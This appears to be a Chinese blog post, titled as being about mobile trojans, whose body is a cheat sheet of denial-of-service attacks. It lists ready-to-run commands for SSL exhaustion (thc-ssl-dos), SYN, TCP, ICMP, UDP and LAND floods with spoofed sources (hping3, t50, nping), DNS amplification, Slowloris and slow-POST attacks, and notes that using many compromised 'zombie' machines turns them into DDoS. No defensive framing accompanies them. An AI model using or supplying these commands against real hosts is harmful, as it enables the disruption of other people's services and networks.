0
点赞
收藏
分享

微信扫一扫

手机木马以及移动安全

探头的新芽 2022-03-18 阅读 140
网络安全

android系统:基于linux

开发语言可能会选择java

pc程序的制作选择:

纠结什么语言有前途?

android木马:

工具:

DOS拒绝服务攻击/DDOS分布式拒绝服务攻击(利用tcp三次握手协议缺陷)

kali的更新源设置为阿里云的:

/etc/apt/source.list
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
apt-get update 更新
apt-get install thc-ssl-dos 安装软件

类似kali的安全审计系统 (功能比kali更强大)

DDOS操作需要的软件: thc-ssl-dos  可以打击https的网站 默认端口是443

DOS:(肉鸡多了使用同样的命令就是DDOS攻击)

ssl-dos:

服务器每次会处理300次/s的ssl请求

这种攻击方法和传统攻击不一样,使用普通带宽也可以考虑打30G带宽的服务器

apt-get install thc-ssl-dos

目标是打击https的网站

thc-ssl-dos [目标ip] [目标ssl端口:443] --accept

syn flood /syn洪水攻击

apt install python-scapy
apt install python3-scapy


git clone https://github.com/EmreOvunc/Python-SYN-Flood-Attack-Tool.git
cd Python-SYN-Flood-Attack-Tool
chmod 777 ./*


python3 py3_synflood_cmd.py -t 10.20.30.40 -p 8080 -c 5   //c表示number of packets 包的数量
python3 py3_SYN-Flood.py
python SYN-Flood.py

sockstress

DNS流量放大攻击

apt-get install dnsutils  //安装dig命令


dig ANY [目标ip(外网)] @[dns服务器地址]
dig ANY qq.com @[dns的ip]

慢速攻击(打击网站有效果):

apt-get install openssl
apt-get install libssl-dev
apt-get install slowhttptest

slowhttptest

低带宽应用层慢速DOS攻击(相对于cc慢)

擅长攻击apache tomcat...服务器

耗尽应用并发的连接池,类似于http层的syn_flood

http协议默认在服务端全部接收到请求之后才开始处理,如果客户发送的数据包慢速而且不完整,就会导致Dos

可以发动的攻击类型:Slowloris,slow http post攻击

Slowloris:完整的http协议结尾是\r\n\r\n,它的攻击结尾\r\n

slow http post攻击:http头部content-length声明长度,但是body缓慢发送

slow http post慢速攻击(RUDY):

slowhttptest -c 2000 -B -g -o body_states -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168.1.214 -x 10 -p 3

Slowloris攻击:

slowhttptest -c 2000 -H -g -o my_header_states -i 10 -r 1000 -t GET -u http://192.168.1.214 -x 24 -p 3

hping3

syn-flood

hping3 -c 3000 -d 120 -S -w 64 -p 80 --flood --rand-source [目标ip]
hping3 -S -P -p 80 --flood --rand-source [目标ip]

tcp-flood

hping3 -SARUFP -p 80 --flood --rand-source [目标ip]

icmp-flood

hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood [目标ip]

udp-flood

hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood [目标ip]

LAND

特殊的syn-flood攻击

源地址和目的地址都是受害者,自己和自己完成3次握手

hping3 -n -a [目标ip] -S -d 100 -p 80 --flood [目标ip]

TCP全链接DOS攻击

nping --tcp-connect --rate=10000 -c 10000000 -q [目标ip]

siege发起攻击

siege -i -c 1000000 [目标ip] -A httttttp

t50压力测试

网络协议支持全面

t50 -h 可以查看参数
t50 [目标网关] --flood --turbo -S --protocol TCP --dport 22
t50 --flood --protocol TCP [目标ip] --dport 80

举报

相关推荐

手机木马远程控制复现

spring安全java

【安全】挖矿木马自助清理手册

leetcode算法职场和发展

免杀技术以及木马处理

网络安全

正确认识挖矿木马,以及如何处理挖矿木马

服务器计划任务网络安全

使用Kali生成木马入侵安卓手机

日记本

网络安全之认识挖矿木马

web安全区块链安全

Android开发实战《手机安全卫士》——4.“手机防盗”模块拓展 & 手势移动

android手机卫士idexml编程语言

移动应用安全

学习回归机器学习人工智能

济南奇牛科技移动办公手机安全管理平台功能说明

算法贪心算法c++c语言竞赛noinoip

【网络安全】渗透测试之木马免杀

web安全安全
0 条评论